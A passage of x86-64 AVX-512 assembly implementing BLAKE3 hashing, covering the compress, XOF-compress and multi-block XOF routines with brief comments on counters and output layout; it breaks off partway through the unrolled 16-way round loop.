vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm5
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x93
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x39
vpaddd xmm0, xmm0, xmm6
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm7
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x39
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x93
dec al
jz 9f
vshufps xmm8, xmm4, xmm5, 214
vpshufd xmm9, xmm4, 0x0F
vpshufd xmm4, xmm8, 0x39
vshufps xmm8, xmm6, xmm7, 250
vpblendd xmm9, xmm9, xmm8, 0xAA
vpunpcklqdq xmm8, xmm7, xmm5
vpblendd xmm8, xmm8, xmm6, 0x88
vpshufd xmm8, xmm8, 0x78
vpunpckhdq xmm5, xmm5, xmm7
vpunpckldq xmm6, xmm6, xmm5
vpshufd xmm7, xmm6, 0x1E
vmovdqa xmm5, xmm9
vmovdqa xmm6, xmm8
jmp 9b
9:
vpxor xmm0, xmm0, xmm2
vpxor xmm1, xmm1, xmm3
vmovdqu xmmword ptr [rdi], xmm0
vmovdqu xmmword ptr [rdi+0x10], xmm1
ret
.p2align 6
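// blake3_compress_xof_avx512: same inputs as compress_in_place, plus
// r9 = 64-byte output. The second 32 bytes are the post-compression
// rows 2-3 XORed with the input CV, per the BLAKE3 XOF definition.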
_blake3_compress_xof_avx512:
blake3_compress_xof_avx512:
_CET_ENDBR
vmovdqu xmm0, xmmword ptr [rdi]
vmovdqu xmm1, xmmword ptr [rdi+0x10]
movzx eax, r8b
movzx edx, dl
shl rax, 32
add rdx, rax
vmovq xmm3, rcx
vmovq xmm4, rdx
vpunpcklqdq xmm3, xmm3, xmm4
vmovaps xmm2, xmmword ptr [BLAKE3_IV+rip]
vmovups xmm8, xmmword ptr [rsi]
vmovups xmm9, xmmword ptr [rsi+0x10]
vshufps xmm4, xmm8, xmm9, 136
vshufps xmm5, xmm8, xmm9, 221
vmovups xmm8, xmmword ptr [rsi+0x20]
vmovups xmm9, xmmword ptr [rsi+0x30]
vshufps xmm6, xmm8, xmm9, 136
vshufps xmm7, xmm8, xmm9, 221
vpshufd xmm6, xmm6, 0x93
vpshufd xmm7, xmm7, 0x93
mov al, 7
9:
vpaddd xmm0, xmm0, xmm4
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm5
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x93
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x39
vpaddd xmm0, xmm0, xmm6
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm7
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x39
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x93
dec al
jz 9f
vshufps xmm8, xmm4, xmm5, 214
vpshufd xmm9, xmm4, 0x0F
vpshufd xmm4, xmm8, 0x39
vshufps xmm8, xmm6, xmm7, 250
vpblendd xmm9, xmm9, xmm8, 0xAA
vpunpcklqdq xmm8, xmm7, xmm5
vpblendd xmm8, xmm8, xmm6, 0x88
vpshufd xmm8, xmm8, 0x78
vpunpckhdq xmm5, xmm5, xmm7
vpunpckldq xmm6, xmm6, xmm5
vpshufd xmm7, xmm6, 0x1E
vmovdqa xmm5, xmm9
vmovdqa xmm6, xmm8
jmp 9b
9:
vpxor xmm0, xmm0, xmm2
vpxor xmm1, xmm1, xmm3
vpxor xmm2, xmm2, [rdi]
vpxor xmm3, xmm3, [rdi+0x10]
vmovdqu xmmword ptr [r9], xmm0
vmovdqu xmmword ptr [r9+0x10], xmm1
vmovdqu xmmword ptr [r9+0x20], xmm2
vmovdqu xmmword ptr [r9+0x30], xmm3
ret
.p2align 6
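// blake3_xof_many_avx512: produce the number of consecutive 64-byte XOF
// blocks passed on the stack ([rsp+0x8] on entry) into r9. A single
// block takes the scalar-style fast path below; otherwise the wide
// 16-way path at label 2 is used.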
blake3_xof_many_avx512:
_blake3_xof_many_avx512:
_CET_ENDBR
mov r10,QWORD PTR [rsp+0x8]
cmp r10,0x1
ja 2f
vmovdqu xmm0,XMMWORD PTR [rdi]
vmovdqu xmm1,XMMWORD PTR [rdi+0x10]
movzx eax,r8b
movzx edx,dl
shl rax,0x20
add rdx,rax
vmovq xmm3,rcx
vmovq xmm4,rdx
vpunpcklqdq xmm3,xmm3,xmm4
vmovaps xmm2,XMMWORD PTR [BLAKE3_IV+rip]
vmovups xmm8,XMMWORD PTR [rsi]
vmovups xmm9,XMMWORD PTR [rsi+0x10]
vshufps xmm4,xmm8,xmm9,0x88
vshufps xmm5,xmm8,xmm9,0xdd
vmovups xmm8,XMMWORD PTR [rsi+0x20]
vmovups xmm9,XMMWORD PTR [rsi+0x30]
vshufps xmm6,xmm8,xmm9,0x88
vshufps xmm7,xmm8,xmm9,0xdd
vpshufd xmm6,xmm6,0x93
vpshufd xmm7,xmm7,0x93
mov al,0x7
3:
vpaddd xmm0,xmm0,xmm4
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x10
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0xc
vpaddd xmm0,xmm0,xmm5
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x8
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0x7
vpshufd xmm0,xmm0,0x93
vpshufd xmm3,xmm3,0x4e
vpshufd xmm2,xmm2,0x39
vpaddd xmm0,xmm0,xmm6
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x10
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0xc
vpaddd xmm0,xmm0,xmm7
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x8
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0x7
vpshufd xmm0,xmm0,0x39
vpshufd xmm3,xmm3,0x4e
vpshufd xmm2,xmm2,0x93
dec al
je 3f
vshufps xmm8,xmm4,xmm5,0xd6
vpshufd xmm9,xmm4,0xf
vpshufd xmm4,xmm8,0x39
vshufps xmm8,xmm6,xmm7,0xfa
vpblendd xmm9,xmm9,xmm8,0xaa
vpunpcklqdq xmm8,xmm7,xmm5
vpblendd xmm8,xmm8,xmm6,0x88
vpshufd xmm8,xmm8,0x78
vpunpckhdq xmm5,xmm5,xmm7
vpunpckldq xmm6,xmm6,xmm5
vpshufd xmm7,xmm6,0x1e
vmovdqa xmm5,xmm9
vmovdqa xmm6,xmm8
jmp 3b
3:
vpxor xmm0,xmm0,xmm2
vpxor xmm1,xmm1,xmm3
vpxor xmm2,xmm2,XMMWORD PTR [rdi]
vpxor xmm3,xmm3,XMMWORD PTR [rdi+0x10]
vmovdqu XMMWORD PTR [r9],xmm0
vmovdqu XMMWORD PTR [r9+0x10],xmm1
vmovdqu XMMWORD PTR [r9+0x20],xmm2
vmovdqu XMMWORD PTR [r9+0x30],xmm3
ret
.p2align 6
2:
push rbp
mov rbp,rsp
sub rsp,0x90
and rsp,0xffffffffffffffc0
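// Build per-lane 64-bit counters: low dwords are counter + {0..15}
// (ADD0); vpcmpltud detects unsigned wrap-around so ADD1 carries into
// the high dwords of exactly the lanes that overflowed.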
vpbroadcastd zmm0,ecx
shr rcx,0x20
vpbroadcastd zmm1,ecx
vpaddd zmm2,zmm0,ZMMWORD PTR [ADD0+rip]
vpcmpltud k1,zmm2,zmm0
vpaddd zmm1{k1},zmm1,DWORD PTR [ADD1+rip]{1to16}
vmovdqa32 ZMMWORD PTR [rsp],zmm2
vmovdqa32 ZMMWORD PTR [rsp+0x40],zmm1
cmp r10,0x10
jb 2f
3:
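// 16-block main loop: broadcast the message words (zmm16-zmm31), the CV
// (zmm0-zmm7), the IV, the counters, block length (edx) and flags (r8d),
// then run the seven BLAKE3 rounds fully unrolled with the message
// schedule baked in.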
vpbroadcastd zmm16,DWORD PTR [rsi]
vpbroadcastd zmm17,DWORD PTR [rsi+0x4]
vpbroadcastd zmm18,DWORD PTR [rsi+0x8]
vpbroadcastd zmm19,DWORD PTR [rsi+0xc]
vpbroadcastd zmm20,DWORD PTR [rsi+0x10]
vpbroadcastd zmm21,DWORD PTR [rsi+0x14]
vpbroadcastd zmm22,DWORD PTR [rsi+0x18]
vpbroadcastd zmm23,DWORD PTR [rsi+0x1c]
vpbroadcastd zmm24,DWORD PTR [rsi+0x20]
vpbroadcastd zmm25,DWORD PTR [rsi+0x24]
vpbroadcastd zmm26,DWORD PTR [rsi+0x28]
vpbroadcastd zmm27,DWORD PTR [rsi+0x2c]
vpbroadcastd zmm28,DWORD PTR [rsi+0x30]
vpbroadcastd zmm29,DWORD PTR [rsi+0x34]
vpbroadcastd zmm30,DWORD PTR [rsi+0x38]
vpbroadcastd zmm31,DWORD PTR [rsi+0x3c]
vpbroadcastd zmm0,DWORD PTR [rdi]
vpbroadcastd zmm1,DWORD PTR [rdi+0x4]
vpbroadcastd zmm2,DWORD PTR [rdi+0x8]
vpbroadcastd zmm3,DWORD PTR [rdi+0xc]
vpbroadcastd zmm4,DWORD PTR [rdi+0x10]
vpbroadcastd zmm5,DWORD PTR [rdi+0x14]
vpbroadcastd zmm6,DWORD PTR [rdi+0x18]
vpbroadcastd zmm7,DWORD PTR [rdi+0x1c]
vpbroadcastd zmm8,DWORD PTR [BLAKE3_IV_0+rip]
vpbroadcastd zmm9,DWORD PTR [BLAKE3_IV_1+rip]
vpbroadcastd zmm10,DWORD PTR [BLAKE3_IV_2+rip]
vpbroadcastd zmm11,DWORD PTR [BLAKE3_IV_3+rip]
vmovdqa32 zmm12,ZMMWORD PTR [rsp]
vmovdqa32 zmm13,ZMMWORD PTR [rsp+0x40]
vpbroadcastd zmm14,edx
vpbroadcastd zmm15,r8d
vpaddd zmm0,zmm0,zmm16
vpaddd zmm1,zmm1,zmm18
vpaddd zmm2,zmm2,zmm20
vpaddd zmm3,zmm3,zmm22
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm17
vpaddd zmm1,zmm1,zmm19
vpaddd zmm2,zmm2,zmm21
vpaddd zmm3,zmm3,zmm23
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm24
vpaddd zmm1,zmm1,zmm26
vpaddd zmm2,zmm2,zmm28
vpaddd zmm3,zmm3,zmm30
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm25
vpaddd zmm1,zmm1,zmm27
vpaddd zmm2,zmm2,zmm29
vpaddd zmm3,zmm3,zmm31
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm18
vpaddd zmm1,zmm1,zmm19
vpaddd zmm2,zmm2,zmm23
vpaddd zmm3,zmm3,zmm20
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm22
vpaddd zmm1,zmm1,zmm26
vpaddd zmm2,zmm2,zmm16
vpaddd zmm3,zmm3,zmm29
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm17
vpaddd zmm1,zmm1,zmm28
vpaddd zmm2,zmm2,zmm25
vpaddd zmm3,zmm3,zmm31
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm27
vpaddd zmm1,zmm1,zmm21
vpaddd zmm2,zmm2,zmm30
vpaddd zmm3,zmm3,zmm24
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm19
vpaddd zmm1,zmm1,zmm26
vpaddd zmm2,zmm2,zmm29
vpaddd zmm3,zmm3,zmm23
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm20
vpaddd zmm1,zmm1,zmm28
vpaddd zmm2,zmm2,zmm18
vpaddd zmm3,zmm3,zmm30
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm22
vpaddd zmm1,zmm1,zmm25
vpaddd zmm2,zmm2,zmm27
vpaddd zmm3,zmm3,zmm24
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm21
vpaddd zmm1,zmm1,zmm16
vpaddd zmm2,zmm2,zmm31
vpaddd zmm3,zmm3,zmm17
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm26
vpaddd zmm1,zmm1,zmm28
vpaddd zmm2,zmm2,zmm30
vpaddd zmm3,zmm3,zmm29
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm23
vpaddd zmm1,zmm1,zmm25
vpaddd zmm2,zmm2,zmm19
vpaddd zmm3,zmm3,zmm31
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm20
vpaddd zmm1,zmm1,zmm27
vpaddd zmm2,zmm2,zmm21
vpaddd zmm3,zmm3,zmm17
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm16
vpaddd zmm1,zmm1,zmm18
vpaddd zmm2,zmm2,zmm24
vpaddd zmm3,zmm3,zmm22
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm28
vpaddd zmm1,zmm1,zmm25
vpaddd zmm2,zmm2,zmm31
vpaddd zmm3,zmm3,zmm30
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm29
vpaddd zmm1,zmm1,zmm27
vpaddd zmm2,zmm2,zmm26
vpaddd zmm3,zmm3,zmm24
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
